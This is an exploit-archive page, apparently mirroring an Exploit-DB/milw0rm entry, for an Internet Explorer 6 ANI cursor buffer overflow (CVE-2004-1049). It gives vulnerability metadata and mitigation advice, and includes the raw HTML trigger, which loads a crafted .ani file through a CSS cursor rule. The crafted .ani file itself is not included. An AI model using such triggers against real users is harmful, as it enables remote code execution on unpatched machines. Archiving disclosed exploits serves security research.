header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
flashsky
7.5
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 6 and below
Affected Version To: Internet Explorer 6 and below
Patch Exists: NO
Related CWE: CVE-2004-1049
CPE: a:microsoft:internet_explorer
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Remote Code Execution in Internet Explorer

The exploit uses a specially crafted ANI cursor file to trigger a buffer overflow in Internet Explorer. If the user is not patched or browsing with Internet Explorer, the vulnerability can be exploited to execute arbitrary code.

Mitigation:

Apply the latest patches and updates for Internet Explorer. Avoid browsing with Internet Explorer if possible.
Source

Exploit-DB raw data:

<!--
Got to give it to flashsky on this one.  Download this lovely file to your desktop
and get ready to cry if your not patched or browse with ie and the vuln should work.

str0ke
-->

<html>
<style type="text/css">
<!--
body {CURSOR: url("sploits/KERNELBLUE.ani")}
-->
</style>
<body>
111111111111111111111111111111
</body>
</html>

// milw0rm.com [2004-12-25]

Navigation

Suggest Exploit

Services By CQR